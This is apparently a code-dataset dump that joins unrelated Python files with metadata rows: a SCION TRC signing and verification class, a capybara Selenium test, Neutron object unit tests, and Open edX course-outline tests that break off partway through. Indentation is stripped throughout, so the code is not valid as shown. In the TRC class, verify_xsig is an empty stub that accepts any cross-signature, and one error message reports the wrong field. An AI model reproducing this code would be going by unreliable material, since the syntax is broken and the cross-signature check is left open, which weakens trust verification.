def sign(self, isd_as, sig_priv_key):
"""
Sign TRC and add computed signature to the TRC.
:param ISD_AS isd_as: the ISD-AS of signer.
:param SigningKey sig_priv_key: the signing key of signer.
"""
data = self._sig_input()
self.signatures[str(isd_as)] = sign(data, sig_priv_key)
def _sig_input(self):
d = self.dict(False)
for k in d:
if self.FIELDS_MAP[k][1] == dict:
d[k] = self._encode_dict(d[k])
j = json.dumps(d, sort_keys=True, separators=(',', ':'))
return j.encode('utf-8')
def _encode_dict(self, dict_):
encoded_dict = {}
for key, val in dict_.items():
if type(val) is dict:
val = self._encode_sub_dict(val)
elif type(val) is bytes:
val = base64.b64encode(val).decode('utf-8')
encoded_dict[key] = val
return encoded_dict
def _encode_sub_dict(self, dict_):
encoded_dict = {}
for key, val in dict_.items():
if type(val) is bytes:
val = base64.b64encode(val).decode('utf-8')
encoded_dict[key] = val
return encoded_dict
def to_json(self, with_signatures=True):
"""
Convert the instance to json format.
"""
trc_dict = copy.deepcopy(self.dict(with_signatures))
for field, decode_list in self.MULTI_DICT_DECODE_FIELDS.items():
for entry in trc_dict[field].values():
for key in decode_list:
entry[key] = base64.b64encode(entry[key]).decode('utf-8')
for field, decode_list in self.SIMPLE_DICT_DECODE_FIELDS.items():
entry = trc_dict.get(field, None)
if not entry or (field == SIGNATURES_STRING and not with_signatures):
continue
# Every value is decoded, if decode_list is empty
for key in decode_list or entry:
entry[key] = base64.b64encode(entry[key]).decode('utf-8')
cert_logs = {}
for subject, entry in trc_dict[CERT_LOGS_STRING].items():
try:
addr = next(iter(entry.keys()))
entry[addr] = base64.b64encode(entry[addr]).decode('utf-8')
cert_logs[subject] = entry
except StopIteration:
pass
trc_dict[CERT_LOGS_STRING] = cert_logs
trc_str = json.dumps(trc_dict, sort_keys=True, indent=4)
return trc_str
def pack(self, lz4_=False):
ret = self.to_json().encode('utf-8')
if lz4_:
return lz4.dumps(ret)
return ret
def __str__(self):
return self.to_json()
def __eq__(self, other): # pragma: no cover
return str(self) == str(other)
def check_active(self, max_trc=None):
"""
Check if trusted TRC is active and can be used for certificate chain verification.
:param TRC max_trc: newest available TRC for same ISD. (If none, self is newest TRC)
:raises: SCIONVerificationError
"""
if self.quarantine:
raise SCIONVerificationError("Early announcement")
now = int(time.time())
if not (self.create_time <= now <= self.exp_time):
raise SCIONVerificationError("Current time outside of validity period. "
"Now %s Creation %s Expiration %s" %
(now, self.create_time, self.exp_time))
if not max_trc or self.version == max_trc.version:
return
if self.version + 1 != max_trc.version:
raise SCIONVerificationError("Inactive TRC version: %s. Expected %s or %s" % (
self.version, max_trc.version, max_trc.version - 1))
if now > max_trc.create_time + max_trc.grace_period:
raise SCIONVerificationError("TRC grace period has passed. Now %s Expiration %s" % (
now, max_trc.create_time + max_trc.grace_period))
def verify(self, trusted_trc):
"""
Verify TRC based on a trusted TRC.
:param TRC trusted_trc: a verified TRC, used as a trust anchor.
:raises: SCIONVerificationError
"""
if self.version == 0:
raise SCIONVerificationError("Invalid TRC version 0")
if self.isd == trusted_trc.isd:
self.verify_update(trusted_trc)
else:
self.verify_xsig(trusted_trc)
def verify_update(self, old_trc):
"""
Verify TRC update.
Unsuccessful verification raises an error.
:param TRC old_trc: a verified TRC, used as a trust anchor.
:raises: SCIONVerificationError
"""
if old_trc.isd != self.isd:
raise SCIONVerificationError("Invalid TRC ISD %s. Expected %s" % (
self.isd, old_trc.isd))
if old_trc.version + 1 != self.version:
raise SCIONVerificationError("Invalid TRC version %s. Expected %s" % (
self.version, old_trc.isd + 1))
if self.create_time < old_trc.create_time + old_trc.grace_period:
raise SCIONVerificationError("Invalid timestamp %s. Expected > %s " % (
self.create_time, old_trc.create_time + old_trc.grace_period))
if self.quarantine or old_trc.quarantine:
raise SCIONVerificationError("Early announcement")
self._verify_signatures(old_trc)
def verify_xsig(self, neigh_trc):
"""
Verify cross signatures.
:param TRC neigh_trc: neighbour TRC, used as a trust anchor.
:raises: SCIONVerificationError
"""
pass
def _verify_signatures(self, old_trc):
"""
Perform signature verification for core signatures as defined
in old TRC. Raises an error if verification is unsuccessful.
:param: TRC old_trc: the previous TRC which has already been verified.
:raises: SCIONVerificationError
"""
# Only look at signatures which are from core ASes as defined in old TRC
val_count = 0
# Count number of verifiable signatures
for signer in old_trc.core_ases.keys():
public_key = old_trc.core_ases[signer][ONLINE_KEY_STRING]
try:
verify(self._sig_input(), self.signatures[signer], public_key)
val_count += 1
except (SCIONVerificationError, KeyError):
continue
# Check if enough valid signatures
if val_count < old_trc.quorum_trc:
raise SCIONVerificationError("Not enough valid signatures %s. Expected %s" % (
val_count, old_trc.quorum_trc))
| apache-2.0 | -1,832,684,012,152,019,700 | 36.871053 | 96 | 0.598638 | false |
elliterate/capybara.py | tests/_test_selenium_marionette.py | 1 | 2359 | import os
import pytest
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.firefox.options import Options
import capybara
from capybara.selenium.driver import Driver
from capybara.session import Session
from capybara.tests.app import app
from capybara.tests.suite import DriverSuite
from tests.selenium_session_test_case import SeleniumSessionTestCase
capabilities = DesiredCapabilities.FIREFOX.copy()
capabilities["marionette"] = True
firefox_options = Options()
if os.environ.get("HEADLESS"):
firefox_options.add_argument("--headless")
# Allow the driver to attach files.
firefox_options.set_preference("dom.file.createInChild", True)
@capybara.register_driver("selenium_marionette")
def init_selenium_marionette_driver(app):
return Driver(
app,
browser="firefox",
desired_capabilities=capabilities,
firefox_options=firefox_options)
@capybara.register_driver("selenium_marionette_clear_storage")
def init_selenium_marionette_clear_storage_driver(app):
return Driver(
app,
browser="firefox",
desired_capabilities=capabilities,
clear_local_storage=True,
clear_session_storage=True,
firefox_options=firefox_options)
SeleniumMarionetteDriverSuite = DriverSuite("selenium_marionette")
class TestSeleniumSession(SeleniumSessionTestCase):
@pytest.fixture(scope="module")
def session(self):
return Session("selenium_marionette", app)
class TestSeleniumMarionette:
def test_reset_does_not_clear_either_storage_by_default(self):
session = Session("selenium_marionette", app)
session.visit("/with_js")
session.find("css", "#set-storage").click()
session.reset()
session.visit("/with_js")
assert session.evaluate_script("window.localStorage.length") > 0
assert session.evaluate_script("window.sessionStorage.length") > 0
def test_reset_clears_storage_when_set(self):
session = Session("selenium_marionette_clear_storage", app)
session.visit("/with_js")
session.find("css", "#set-storage").click()
session.reset()
session.visit("/with_js")
assert session.evaluate_script("window.localStorage.length") == 0
assert session.evaluate_script("window.sessionStorage.length") == 0
| mit | 1,059,170,167,414,687,000 | 32.225352 | 78 | 0.72234 | false |
yanheven/neutron | neutron/tests/unit/objects/test_base.py | 6 | 13419 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from oslo_db import exception as obj_exc
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
from neutron.common import exceptions as n_exc
from neutron.common import utils as common_utils
from neutron import context
from neutron.db import api as db_api
from neutron.objects import base
from neutron.tests import base as test_base
from neutron.tests import tools
SQLALCHEMY_COMMIT = 'sqlalchemy.engine.Connection._commit_impl'
OBJECTS_BASE_OBJ_FROM_PRIMITIVE = ('oslo_versionedobjects.base.'
'VersionedObject.obj_from_primitive')
class FakeModel(object):
def __init__(self, *args, **kwargs):
pass
@obj_base.VersionedObjectRegistry.register
class FakeNeutronObject(base.NeutronDbObject):
db_model = FakeModel
fields = {
'id': obj_fields.UUIDField(),
'field1': obj_fields.StringField(),
'field2': obj_fields.StringField()
}
fields_no_update = ['id']
synthetic_fields = ['field2']
FIELD_TYPE_VALUE_GENERATOR_MAP = {
obj_fields.BooleanField: tools.get_random_boolean,
obj_fields.IntegerField: tools.get_random_integer,
obj_fields.StringField: tools.get_random_string,
obj_fields.UUIDField: tools.get_random_string,
obj_fields.ListOfObjectsField: lambda: []
}
def get_obj_db_fields(obj):
return {field: getattr(obj, field) for field in obj.fields
if field not in obj.synthetic_fields}
class _BaseObjectTestCase(object):
_test_class = FakeNeutronObject
def setUp(self):
super(_BaseObjectTestCase, self).setUp()
self.context = context.get_admin_context()
self.db_objs = list(self.get_random_fields() for _ in range(3))
self.db_obj = self.db_objs[0]
valid_field = [f for f in self._test_class.fields
if f not in self._test_class.synthetic_fields][0]
self.valid_field_filter = {valid_field: self.db_obj[valid_field]}
@classmethod
def get_random_fields(cls, obj_cls=None):
obj_cls = obj_cls or cls._test_class
fields = {}
for field, field_obj in obj_cls.fields.items():
if field not in obj_cls.synthetic_fields:
generator = FIELD_TYPE_VALUE_GENERATOR_MAP[type(field_obj)]
fields[field] = generator()
return fields
def get_updatable_fields(self, fields):
return base.get_updatable_fields(self._test_class, fields)
@classmethod
def _is_test_class(cls, obj):
return isinstance(obj, cls._test_class)
class BaseObjectIfaceTestCase(_BaseObjectTestCase, test_base.BaseTestCase):
def test_get_by_id(self):
with mock.patch.object(db_api, 'get_object',
return_value=self.db_obj) as get_object_mock:
obj = self._test_class.get_by_id(self.context, id='fake_id')
self.assertTrue(self._is_test_class(obj))
self.assertEqual(self.db_obj, get_obj_db_fields(obj))
get_object_mock.assert_called_once_with(
self.context, self._test_class.db_model, id='fake_id')
def test_get_by_id_missing_object(self):
with mock.patch.object(db_api, 'get_object', return_value=None):
obj = self._test_class.get_by_id(self.context, id='fake_id')
self.assertIsNone(obj)
def test_get_objects(self):
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs) as get_objects_mock:
objs = self._test_class.get_objects(self.context)
self._validate_objects(self.db_objs, objs)
get_objects_mock.assert_called_once_with(
self.context, self._test_class.db_model)
def test_get_objects_valid_fields(self):
with mock.patch.object(
db_api, 'get_objects',
return_value=[self.db_obj]) as get_objects_mock:
objs = self._test_class.get_objects(self.context,
**self.valid_field_filter)
self._validate_objects([self.db_obj], objs)
get_objects_mock.assert_called_with(
self.context, self._test_class.db_model,
**self.valid_field_filter)
def test_get_objects_mixed_fields(self):
synthetic_fields = self._test_class.synthetic_fields
if not synthetic_fields:
self.skipTest('No synthetic fields found in test class %r' %
self._test_class)
filters = copy.copy(self.valid_field_filter)
filters[synthetic_fields[0]] = 'xxx'
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs):
self.assertRaises(base.exceptions.InvalidInput,
self._test_class.get_objects, self.context,
**filters)
def test_get_objects_synthetic_fields(self):
synthetic_fields = self._test_class.synthetic_fields
if not synthetic_fields:
self.skipTest('No synthetic fields found in test class %r' %
self._test_class)
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs):
self.assertRaises(base.exceptions.InvalidInput,
self._test_class.get_objects, self.context,
**{synthetic_fields[0]: 'xxx'})
def test_get_objects_invalid_fields(self):
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs):
self.assertRaises(base.exceptions.InvalidInput,
self._test_class.get_objects, self.context,
fake_field='xxx')
def _validate_objects(self, expected, observed):
self.assertTrue(all(self._is_test_class(obj) for obj in observed))
self.assertEqual(
sorted(expected,
key=common_utils.safe_sort_key),
sorted([get_obj_db_fields(obj) for obj in observed],
key=common_utils.safe_sort_key))
def _check_equal(self, obj, db_obj):
self.assertEqual(
sorted(db_obj),
sorted(get_obj_db_fields(obj)))
def test_create(self):
with mock.patch.object(db_api, 'create_object',
return_value=self.db_obj) as create_mock:
obj = self._test_class(self.context, **self.db_obj)
self._check_equal(obj, self.db_obj)
obj.create()
self._check_equal(obj, self.db_obj)
create_mock.assert_called_once_with(
self.context, self._test_class.db_model, self.db_obj)
def test_create_updates_from_db_object(self):
with mock.patch.object(db_api, 'create_object',
return_value=self.db_obj):
obj = self._test_class(self.context, **self.db_objs[1])
self._check_equal(obj, self.db_objs[1])
obj.create()
self._check_equal(obj, self.db_obj)
def test_create_duplicates(self):
with mock.patch.object(db_api, 'create_object',
side_effect=obj_exc.DBDuplicateEntry):
obj = self._test_class(self.context, **self.db_obj)
self.assertRaises(base.NeutronDbObjectDuplicateEntry, obj.create)
@mock.patch.object(db_api, 'update_object')
def test_update_no_changes(self, update_mock):
with mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value={}):
obj = self._test_class(self.context)
obj.update()
self.assertFalse(update_mock.called)
@mock.patch.object(db_api, 'update_object')
def test_update_changes(self, update_mock):
fields_to_update = self.get_updatable_fields(self.db_obj)
with mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value=fields_to_update):
obj = self._test_class(self.context, **self.db_obj)
obj.update()
update_mock.assert_called_once_with(
self.context, self._test_class.db_model,
self.db_obj['id'], fields_to_update)
@mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value={'a': 'a', 'b': 'b', 'c': 'c'})
def test_update_changes_forbidden(self, *mocks):
with mock.patch.object(
self._test_class,
'fields_no_update',
new_callable=mock.PropertyMock(return_value=['a', 'c']),
create=True):
obj = self._test_class(self.context, **self.db_obj)
self.assertRaises(base.NeutronObjectUpdateForbidden, obj.update)
def test_update_updates_from_db_object(self):
with mock.patch.object(db_api, 'update_object',
return_value=self.db_obj):
obj = self._test_class(self.context, **self.db_objs[1])
fields_to_update = self.get_updatable_fields(self.db_objs[1])
with mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value=fields_to_update):
obj.update()
self._check_equal(obj, self.db_obj)
@mock.patch.object(db_api, 'delete_object')
def test_delete(self, delete_mock):
obj = self._test_class(self.context, **self.db_obj)
self._check_equal(obj, self.db_obj)
obj.delete()
self._check_equal(obj, self.db_obj)
delete_mock.assert_called_once_with(
self.context, self._test_class.db_model, self.db_obj['id'])
@mock.patch(OBJECTS_BASE_OBJ_FROM_PRIMITIVE)
def test_clean_obj_from_primitive(self, get_prim_m):
expected_obj = get_prim_m.return_value
observed_obj = self._test_class.clean_obj_from_primitive('foo', 'bar')
self.assertIs(expected_obj, observed_obj)
self.assertTrue(observed_obj.obj_reset_changes.called)
class BaseDbObjectTestCase(_BaseObjectTestCase):
def test_get_by_id_create_update_delete(self):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
new = self._test_class.get_by_id(self.context, id=obj.id)
self.assertEqual(obj, new)
obj = new
for key, val in self.get_updatable_fields(self.db_objs[1]).items():
setattr(obj, key, val)
obj.update()
new = self._test_class.get_by_id(self.context, id=obj.id)
self.assertEqual(obj, new)
obj = new
new.delete()
new = self._test_class.get_by_id(self.context, id=obj.id)
self.assertIsNone(new)
def test_update_non_existent_object_raises_not_found(self):
obj = self._test_class(self.context, **self.db_obj)
obj.obj_reset_changes()
for key, val in self.get_updatable_fields(self.db_obj).items():
setattr(obj, key, val)
self.assertRaises(n_exc.ObjectNotFound, obj.update)
def test_delete_non_existent_object_raises_not_found(self):
obj = self._test_class(self.context, **self.db_obj)
self.assertRaises(n_exc.ObjectNotFound, obj.delete)
@mock.patch(SQLALCHEMY_COMMIT)
def test_create_single_transaction(self, mock_commit):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
self.assertEqual(1, mock_commit.call_count)
def test_update_single_transaction(self):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
for key, val in self.get_updatable_fields(self.db_obj).items():
setattr(obj, key, val)
with mock.patch(SQLALCHEMY_COMMIT) as mock_commit:
obj.update()
self.assertEqual(1, mock_commit.call_count)
def test_delete_single_transaction(self):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
with mock.patch(SQLALCHEMY_COMMIT) as mock_commit:
obj.delete()
self.assertEqual(1, mock_commit.call_count)
@mock.patch(SQLALCHEMY_COMMIT)
def test_get_objects_single_transaction(self, mock_commit):
self._test_class.get_objects(self.context)
self.assertEqual(1, mock_commit.call_count)
@mock.patch(SQLALCHEMY_COMMIT)
def test_get_by_id_single_transaction(self, mock_commit):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
obj = self._test_class.get_by_id(self.context, obj.id)
self.assertEqual(2, mock_commit.call_count)
| apache-2.0 | -6,890,074,864,445,030,000 | 38.122449 | 78 | 0.605112 | false |
EDUlib/edx-platform | openedx/features/course_experience/tests/views/test_course_outline.py | 1 | 34329 | """
Tests for the Course Outline view and supporting views.
"""
import datetime
import re
import ddt
import six
from completion.waffle import ENABLE_COMPLETION_TRACKING_SWITCH
from completion.models import BlockCompletion
from completion.test_utils import CompletionWaffleTestMixin
from django.contrib.sites.models import Site
from django.test import RequestFactory, override_settings
from django.urls import reverse
from django.utils import timezone
from edx_toggles.toggles.testutils import override_waffle_switch
from milestones.tests.utils import MilestonesTestCaseMixin
from mock import Mock, patch
from opaque_keys.edx.keys import CourseKey, UsageKey
from pyquery import PyQuery as pq
from pytz import UTC
from six import text_type
from waffle.models import Switch
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from lms.djangoapps.course_api.blocks.transformers.milestones import MilestonesAndSpecialExamsTransformer
from lms.djangoapps.gating import api as lms_gating_api
from lms.djangoapps.courseware.tests.factories import StaffFactory
from lms.djangoapps.courseware.tests.helpers import MasqueradeMixin
from lms.djangoapps.experiments.testutils import override_experiment_waffle_flag
from lms.urls import RESET_COURSE_DEADLINES_NAME
from openedx.core.djangoapps.course_date_signals.models import SelfPacedRelativeDatesConfig
from openedx.core.djangoapps.schedules.models import Schedule
from openedx.core.djangoapps.schedules.tests.factories import ScheduleFactory # pylint: disable=unused-import
from openedx.core.lib.gating import api as gating_api
from openedx.features.content_type_gating.models import ContentTypeGatingConfig
from openedx.features.course_experience import RELATIVE_DATES_FLAG
from openedx.features.course_experience.views.course_outline import (
DEFAULT_COMPLETION_TRACKING_START,
CourseOutlineFragmentView
)
from common.djangoapps.student.models import CourseEnrollment
from common.djangoapps.student.tests.factories import UserFactory
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from ...utils import get_course_outline_block_tree
from .test_course_home import course_home_url
TEST_PASSWORD = 'test'
GATING_NAMESPACE_QUALIFIER = '.gating'
@ddt.ddt
class TestCourseOutlinePage(SharedModuleStoreTestCase, MasqueradeMixin):
"""
Test the course outline view.
"""
ENABLED_SIGNALS = ['course_published']
@classmethod
def setUpClass(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""
Set up an array of various courses to be tested.
"""
SelfPacedRelativeDatesConfig.objects.create(enabled=True)
# setUpClassAndTestData() already calls setUpClass on SharedModuleStoreTestCase
# pylint: disable=super-method-not-called
with super(TestCourseOutlinePage, cls).setUpClassAndTestData():
cls.courses = []
course = CourseFactory.create(self_paced=True)
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location, graded=True, format="Homework") # lint-amnesty, pylint: disable=line-too-long
vertical = ItemFactory.create(category='vertical', parent_location=sequential.location)
problem = ItemFactory.create(category='problem', parent_location=vertical.location)
course.children = [chapter]
chapter.children = [sequential]
sequential.children = [vertical]
vertical.children = [problem]
cls.courses.append(course)
course = CourseFactory.create()
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
sequential2 = ItemFactory.create(category='sequential', parent_location=chapter.location)
vertical = ItemFactory.create(
category='vertical',
parent_location=sequential.location,
display_name="Vertical 1"
)
vertical2 = ItemFactory.create(
category='vertical',
parent_location=sequential2.location,
display_name="Vertical 2"
)
course.children = [chapter]
chapter.children = [sequential, sequential2]
sequential.children = [vertical]
sequential2.children = [vertical2]
cls.courses.append(course)
course = CourseFactory.create()
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(
category='sequential',
parent_location=chapter.location,
due=datetime.datetime.now(),
graded=True,
format='Homework',
)
vertical = ItemFactory.create(category='vertical', parent_location=sequential.location)
course.children = [chapter]
chapter.children = [sequential]
sequential.children = [vertical]
cls.courses.append(course)
@classmethod
def setUpTestData(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""Set up and enroll our fake user in the course."""
cls.user = UserFactory(password=TEST_PASSWORD)
for course in cls.courses:
CourseEnrollment.enroll(cls.user, course.id)
Schedule.objects.update(start_date=timezone.now() - datetime.timedelta(days=1))
def setUp(self):
"""
Set up for the tests.
"""
super(TestCourseOutlinePage, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.client.login(username=self.user.username, password=TEST_PASSWORD)
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_outline_details(self):
for course in self.courses:
url = course_home_url(course)
request_factory = RequestFactory()
request = request_factory.get(url)
request.user = self.user
course_block_tree = get_course_outline_block_tree(
request, str(course.id), self.user
)
response = self.client.get(url)
assert course.children
for chapter in course_block_tree['children']:
self.assertContains(response, chapter['display_name'])
assert chapter['children']
for sequential in chapter['children']:
self.assertContains(response, sequential['display_name'])
if sequential['graded']:
print(sequential)
self.assertContains(response, sequential['due'].strftime(u'%Y-%m-%d %H:%M:%S'))
self.assertContains(response, sequential['format'])
assert sequential['children']
def test_num_graded_problems(self):
course = CourseFactory.create()
with self.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
problem = ItemFactory.create(category='problem', parent_location=sequential.location)
sequential2 = ItemFactory.create(category='sequential', parent_location=chapter.location)
problem2 = ItemFactory.create(category='problem', graded=True, has_score=True,
parent_location=sequential2.location)
sequential3 = ItemFactory.create(category='sequential', parent_location=chapter.location)
problem3_1 = ItemFactory.create(category='problem', graded=True, has_score=True,
parent_location=sequential3.location)
problem3_2 = ItemFactory.create(category='problem', graded=True, has_score=True,
parent_location=sequential3.location)
course.children = [chapter]
chapter.children = [sequential, sequential2, sequential3]
sequential.children = [problem]
sequential2.children = [problem2]
sequential3.children = [problem3_1, problem3_2]
CourseEnrollment.enroll(self.user, course.id)
url = course_home_url(course)
response = self.client.get(url)
content = response.content.decode('utf8')
self.assertRegex(content, sequential.display_name + r'\s*</h4>')
self.assertRegex(content, sequential2.display_name + r'\s*\(1 Question\)\s*</h4>')
self.assertRegex(content, sequential3.display_name + r'\s*\(2 Questions\)\s*</h4>')
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
@ddt.data(
([CourseMode.AUDIT, CourseMode.VERIFIED], CourseMode.AUDIT, False, True),
([CourseMode.AUDIT, CourseMode.VERIFIED], CourseMode.VERIFIED, False, True),
([CourseMode.MASTERS], CourseMode.MASTERS, False, True),
([CourseMode.PROFESSIONAL], CourseMode.PROFESSIONAL, True, True), # staff accounts should also see the banner
)
@ddt.unpack
def test_reset_course_deadlines_banner_shows_for_self_paced_course(
self,
course_modes,
enrollment_mode,
is_course_staff,
should_display
):
ContentTypeGatingConfig.objects.create(
enabled=True,
enabled_as_of=datetime.datetime(2017, 1, 1, tzinfo=UTC),
)
course = self.courses[0]
for mode in course_modes:
CourseModeFactory.create(course_id=course.id, mode_slug=mode)
enrollment = CourseEnrollment.objects.get(course_id=course.id, user=self.user)
enrollment.mode = enrollment_mode
enrollment.save()
enrollment.schedule.start_date = timezone.now() - datetime.timedelta(days=30)
enrollment.schedule.save()
self.user.is_staff = is_course_staff
self.user.save()
url = course_home_url(course)
response = self.client.get(url)
if should_display:
self.assertContains(response, '<div class="banner-cta-text"')
else:
self.assertNotContains(response, '<div class="banner-cta-text"')
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_course_deadlines(self):
course = self.courses[0]
staff = StaffFactory(course_key=course.id)
CourseEnrollment.enroll(staff, course.id)
start_date = timezone.now() - datetime.timedelta(days=30)
Schedule.objects.update(start_date=start_date)
self.client.login(username=staff.username, password=TEST_PASSWORD)
self.update_masquerade(course=course, username=self.user.username)
post_dict = {'course_id': str(course.id)}
self.client.post(reverse(RESET_COURSE_DEADLINES_NAME), post_dict)
updated_schedule = Schedule.objects.get(enrollment__user=self.user, enrollment__course_id=course.id)
assert updated_schedule.start_date.date() == datetime.datetime.today().date()
updated_staff_schedule = Schedule.objects.get(enrollment__user=staff, enrollment__course_id=course.id)
assert updated_staff_schedule.start_date == start_date
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_reset_course_deadlines_masquerade_generic_student(self):
course = self.courses[0]
staff = StaffFactory(course_key=course.id)
CourseEnrollment.enroll(staff, course.id)
start_date = timezone.now() - datetime.timedelta(days=30)
Schedule.objects.update(start_date=start_date)
self.client.login(username=staff.username, password=TEST_PASSWORD)
self.update_masquerade(course=course)
post_dict = {'course_id': str(course.id)}
self.client.post(reverse(RESET_COURSE_DEADLINES_NAME), post_dict)
updated_student_schedule = Schedule.objects.get(enrollment__user=self.user, enrollment__course_id=course.id)
assert updated_student_schedule.start_date == start_date
updated_staff_schedule = Schedule.objects.get(enrollment__user=staff, enrollment__course_id=course.id)
assert updated_staff_schedule.start_date.date() == datetime.date.today()
class TestCourseOutlinePageWithPrerequisites(SharedModuleStoreTestCase, MilestonesTestCaseMixin):
"""
Test the course outline view with prerequisites.
"""
TRANSFORMER_CLASS_TO_TEST = MilestonesAndSpecialExamsTransformer
@classmethod
def setUpClass(cls):
"""
Creates a test course that can be used for non-destructive tests
"""
# pylint: disable=super-method-not-called
cls.PREREQ_REQUIRED = '(Prerequisite required)'
cls.UNLOCKED = 'Unlocked'
with super(TestCourseOutlinePageWithPrerequisites, cls).setUpClassAndTestData():
cls.course, cls.course_blocks = cls.create_test_course()
@classmethod
def setUpTestData(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""Set up and enroll our fake user in the course."""
cls.user = UserFactory(password=TEST_PASSWORD)
CourseEnrollment.enroll(cls.user, cls.course.id)
@classmethod
def create_test_course(cls):
"""Creates a test course."""
course = CourseFactory.create()
course.enable_subsection_gating = True
course_blocks = {}
with cls.store.bulk_operations(course.id):
course_blocks['chapter'] = ItemFactory.create(
category='chapter',
parent_location=course.location
)
course_blocks['prerequisite'] = ItemFactory.create(
category='sequential',
parent_location=course_blocks['chapter'].location,
display_name='Prerequisite Exam'
)
course_blocks['gated_content'] = ItemFactory.create(
category='sequential',
parent_location=course_blocks['chapter'].location,
display_name='Gated Content'
)
course_blocks['prerequisite_vertical'] = ItemFactory.create(
category='vertical',
parent_location=course_blocks['prerequisite'].location
)
course_blocks['gated_content_vertical'] = ItemFactory.create(
category='vertical',
parent_location=course_blocks['gated_content'].location
)
course.children = [course_blocks['chapter']]
course_blocks['chapter'].children = [course_blocks['prerequisite'], course_blocks['gated_content']]
course_blocks['prerequisite'].children = [course_blocks['prerequisite_vertical']]
course_blocks['gated_content'].children = [course_blocks['gated_content_vertical']]
if hasattr(cls, 'user'):
CourseEnrollment.enroll(cls.user, course.id)
return course, course_blocks
def setUp(self):
"""
Set up for the tests.
"""
super(TestCourseOutlinePageWithPrerequisites, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.client.login(username=self.user.username, password=TEST_PASSWORD)
def setup_gated_section(self, gated_block, gating_block):
"""
Test helper to create a gating requirement
Args:
gated_block: The block the that learner will not have access to until they complete the gating block
gating_block: (The prerequisite) The block that must be completed to get access to the gated block
"""
gating_api.add_prerequisite(self.course.id, six.text_type(gating_block.location))
gating_api.set_required_content(self.course.id, gated_block.location, gating_block.location, 100)
def test_content_locked(self):
"""
Test that a sequential/subsection with unmet prereqs correctly indicated that its content is locked
"""
course = self.course
self.setup_gated_section(self.course_blocks['gated_content'], self.course_blocks['prerequisite'])
response = self.client.get(course_home_url(course))
assert response.status_code == 200
response_content = pq(response.content)
# check lock icon is present
lock_icon = response_content('.fa-lock')
assert lock_icon, 'lock icon is not present, but should be'
subsection = lock_icon.parents('.subsection-text')
# check that subsection-title-name is the display name
gated_subsection_title = self.course_blocks['gated_content'].display_name
assert gated_subsection_title in subsection.children('.subsection-title').html()
# check that it says prerequisite required
assert 'Prerequisite:' in subsection.children('.details').html()
# check that there is not a screen reader message
assert not subsection.children('.sr')
def test_content_unlocked(self):
"""
Test that a sequential/subsection with met prereqs correctly indicated that its content is unlocked
"""
course = self.course
self.setup_gated_section(self.course_blocks['gated_content'], self.course_blocks['prerequisite'])
# complete the prerequisite to unlock the gated content
# this call triggers reevaluation of prerequisites fulfilled by the gating block.
with patch('openedx.core.lib.gating.api.get_subsection_completion_percentage', Mock(return_value=100)):
lms_gating_api.evaluate_prerequisite(
self.course,
Mock(location=self.course_blocks['prerequisite'].location, percent_graded=1.0),
self.user,
)
response = self.client.get(course_home_url(course))
assert response.status_code == 200
response_content = pq(response.content)
# check unlock icon is not present
unlock_icon = response_content('.fa-unlock')
assert not unlock_icon, "unlock icon is present, yet shouldn't be."
gated_subsection_title = self.course_blocks['gated_content'].display_name
every_subsection_on_outline = response_content('.subsection-title')
subsection_has_gated_text = False
says_prerequisite_required = False
for subsection_contents in every_subsection_on_outline.contents():
subsection_has_gated_text = gated_subsection_title in subsection_contents
says_prerequisite_required = "Prerequisite:" in subsection_contents
# check that subsection-title-name is the display name of gated content section
assert subsection_has_gated_text
assert not says_prerequisite_required
class TestCourseOutlineResumeCourse(SharedModuleStoreTestCase, CompletionWaffleTestMixin):
"""
Test start course and resume course for the course outline view.
Technically, this mixes course home and course outline tests, but checking
the counts of start/resume course should be done together to avoid false
positives.
"""
@classmethod
def setUpClass(cls):
"""
Creates a test course that can be used for non-destructive tests
"""
# setUpClassAndTestData() already calls setUpClass on SharedModuleStoreTestCase
# pylint: disable=super-method-not-called
with super(TestCourseOutlineResumeCourse, cls).setUpClassAndTestData():
